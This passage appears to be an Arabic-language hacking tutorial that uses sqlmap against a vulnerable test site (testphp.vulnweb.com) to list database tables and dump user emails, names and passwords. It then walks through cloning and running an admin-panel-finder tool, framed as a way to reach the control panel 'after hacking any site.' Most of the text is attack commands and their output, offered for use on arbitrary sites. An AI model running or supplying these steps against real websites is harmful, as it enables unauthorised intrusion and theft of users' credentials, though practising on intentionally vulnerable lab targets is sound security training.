اسم الداتا بيز تبع الموقع acuart

بعد طلعنا اسم الداتا بيز راح نطلع اسماء الجداول الموجوده بالموقع و ذلك عن طريق الامر التالي

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

طلعت لنا اسماء الجداول كما موضح بالصور

ديل اسما الجداول

The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |

بعد طالعناهم راح نستخرج ما بداخل جدول user لان فيهو user password

جلب ما بداخل جدول user

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

بعدها بدنا نفتح كل الايميلات و اسماء مستخدمين الموقع و باسورداتهم

عن طريق الامر التالي

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump

صورة توضح كل شي

كدا طلعنا اسم المستخدم و الاميل و باسورد الموقع

ننتقل للخطوة التاليه و هي لوحه التحكم و كيف يتم جلبها

عادي جدا عن طريق ادوات كثيرة جدا تجلب لوحه تحكم الموقع

اولها اداه admin finder panel

شرح اداة استخراج لوحة التحكم بعد اختراق أي مواقع

امر تثبيت الأداة
 git clone https://github.com/bdblackhat/admin-panel-finder

امر فتح الأداة
 cd admin-panel-finder

امر اعطاء الصلاحيات للأداة
 chmod 777 admin_panel_finder.py


امر تشغيل الأداة
 python2 admin_panel_finder.py


بعدها سوف يطلب رابط الموقع
اكتب رابط الموقع الذي تريد استخراج لوحة التحكم الخاصة به

عند الإنتهاء من التحميل سوف يعطيك رابط لوحة التحكم الخاصة بالموقع

قم بنسخ الرابط ولصقه في المتصفح وتظهر لك لوحة التحكم الخاصة بالموقع



#CS

بعدها ضعو الموقع و يتم التخمين ع لوحه التحكم

بعد كدا
صار عندكم لوحه تحكم الموقع و الباسورد تبع الموقع و ايضا ايميل و اسم المستخدم تبع الموقع